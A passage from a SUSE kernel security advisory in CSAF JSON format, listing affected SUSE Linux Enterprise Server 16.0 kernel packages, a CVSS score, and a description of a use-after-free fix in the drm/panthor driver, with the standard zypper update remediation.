"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68735",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68735"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panthor: Prevent potential UAF in group creation\n\nThis commit prevents the possibility of a use after free issue in the\nGROUP_CREATE ioctl function, which arose as pointer to the group is\naccessed in that ioctl function after storing it in the Xarray.\nA malicious userspace can second guess the handle of a group and try\nto call GROUP_DESTROY ioctl from another thread around the same time\nas GROUP_CREATE ioctl.\n\nTo prevent the use after free exploit, this commit uses a mark on an\nentry of group pool Xarray which is added just before returning from\nthe GROUP_CREATE ioctl function. The mark is checked for all ioctls\nthat specify the group handle and so userspace won\u0027t be abe to delete\na group that isn\u0027t marked yet.\n\nv2: Add R-bs and fixes tags",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68735",
"url": "https://www.suse.com/security/cve/CVE-2025-68735"
},
{
"category": "external",
"summary": "SUSE Bug 1255811 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "external",
"summary": "SUSE Bug 1256251 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1256251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
